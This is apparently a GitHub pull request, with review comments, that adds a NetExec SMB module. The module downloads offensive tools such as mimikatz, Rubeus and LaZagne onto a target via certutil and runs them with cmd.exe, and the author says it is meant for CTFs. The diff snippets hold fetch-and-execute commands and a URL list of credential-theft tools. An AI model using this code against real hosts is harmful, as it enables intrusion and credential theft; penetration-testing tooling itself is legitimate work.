[SMB] New Module quick_tools #540
Conversation
Signed-off-by: termanix <[email protected]>
Improvements on STATUS_PASSWORD_MUST_CHANGE and STATUS_PASSWORD_EXPIRED
Signed-off-by: Fagan Afandiyev <[email protected]>
FaganAfandiyev
requested review from
zblurx,
Marshall-Hallenbeck,
NeffIsBack and
mpgn
as code owners
Signed-off-by: Fagan Afandiyev <[email protected]>
Signed-off-by: Fagan Afandiyev <[email protected]>
Signed-off-by: Fagan Afandiyev <[email protected]>
|
Thanks for the PR! But It looks like you deleted some modules and smb.py :D, can you check the commits? |
| unzip_command = ( | ||
| f'powershell -Command "Expand-Archive -Path \'{self.location}{zip_file}\' -DestinationPath \'{self.location}\' -Force"' | ||
| ) | ||
| context.log.debug(f"Unzipping {zip_file}...") | ||
| output = connection.execute(unzip_command, True) |
There was a problem hiding this comment.
execute() will use cmd to execute stuff, is there any reason the ps_execute function didnt work directly with the Expand-Archive command?
| run_command = f"cmd.exe /c {exe_path} --healthcheck" | ||
| try: | ||
| output = connection.execute(run_command, True) |
There was a problem hiding this comment.
Like above, execute() already runs cmd.exe /c with what you're passing in, does passing in the exe_path directly not work?
| context.log.fail(f"Failed to execute PingCastle: {e}") | ||
|
|
||
| # Transfer HTML and XML reports to local directory | ||
| local_dir = "./pingcastle_reports/" |
There was a problem hiding this comment.
Might be better to save this to the ~/.nxc/modules/$whatever dir? Or allow for it to be configurable?
| "enum": [ | ||
| "https://raw.githubusercontent.com/61106960/adPEAS/refs/heads/main/adPEAS.ps1", | ||
| "https://github.com/peass-ng/PEASS-ng/releases/download/20241201-e3889b61/winPEASx64.exe", | ||
| "https://github.com/jakobfriedl/precompiled-binaries/raw/refs/heads/main/LateralMovement/CertificateAbuse/Certify.exe", | ||
| "https://github.com/AlessandroZ/LaZagne/releases/download/v2.4.6/LaZagne.exe" | ||
| ], | ||
| "exploit": [ | ||
| "https://github.com/jakobfriedl/precompiled-binaries/raw/refs/heads/main/LateralMovement/Rubeus.exe", | ||
| "https://github.com/jakobfriedl/precompiled-binaries/raw/refs/heads/main/LateralMovement/Whisker.exe", | ||
| "https://github.com/jakobfriedl/precompiled-binaries/raw/refs/heads/main/Scripts/PowerUp.ps1", | ||
| "https://github.com/jakobfriedl/precompiled-binaries/raw/refs/heads/main/Scripts/Inveigh.ps1", | ||
| "https://github.com/jakobfriedl/precompiled-binaries/raw/refs/heads/main/Scripts/Powermad.ps1", | ||
| "https://github.com/jakobfriedl/precompiled-binaries/raw/refs/heads/main/Credentials/mimikatz.exe", | ||
| ], | ||
| "pingcastle": [ | ||
| "https://github.com/vletoux/pingcastle/releases/download/3.3.0.1/PingCastle_3.3.0.1.zip" | ||
| ], |
There was a problem hiding this comment.
If we're going to be downloading scripts/executables from the internet, their hashes should probably be hard-coded so we're getting the intended script... There's no guarantee that these repo owners won't swap out these with malware (harmful malware vs intended security products)
| check_command = f"cmd.exe /c if exist {exe_path} (echo PingCastle already exists.) else (echo PingCastle not found.)" | ||
| output = connection.execute(check_command, True) |
There was a problem hiding this comment.
Same question previously, is cmd.exe /c needed?
| check_command = f'cmd.exe /c "if exist {remote_path} (echo {tool_name} exists) else (echo {tool_name} not found)"' | ||
| output = connection.execute(check_command, True) |
There was a problem hiding this comment.
Same question previously, is cmd.exe /c needed?
| check_command = f'cmd.exe /c "if exist {remote_path} (echo {filename} exists) else (echo {filename} not found)"' | ||
| output = connection.execute(check_command, True) |
There was a problem hiding this comment.
Same question previously, is cmd.exe /c needed?
| exec_command = f'cmd.exe /c "{remote_path}" {self.ARGS}' | ||
| context.log.highlight(f"Executing {remote_path} with arguments: {self.ARGS}") | ||
| try: | ||
| exec_output = connection.execute(exec_command, True) |
There was a problem hiding this comment.
Same question previously, is cmd.exe /c needed?
| command = f'cmd.exe /c certutil -urlcache -split -f "{tool}" "{destination}"' | ||
| output = connection.execute(command, True) |
There was a problem hiding this comment.
Same question previously, is cmd.exe /c needed?
There was a problem hiding this comment.
This should not be deleted lol
Description
This tool is to download multiple tools to a target which does not have internet connection. It is meant for CTFs and competitions. There is a pingcastle option ( I can isolate and make another module ) and custom option to put links or a directory to transfer them. You can execute the tools you transfer and give arugements. This works great for chisel and ligolo-ng.
Please include a summary of the change and which issue is fixed, or what the enhancement does.
Please also include relevant motivation and context.
List any dependencies that are required for this change.
Type of change
Please delete options that are not relevant.
How Has This Been Tested?
I have ran it against hackthebox boxes.
Screenshots (if appropriate):
Screenshots are always nice to have and can give a visual representation of the change.
If appropriate include before and after screenshot(s) to show which results are to be expected.
Checklist:
poetry run python -m ruff check . --preview, use--fixto automatically fix what it can)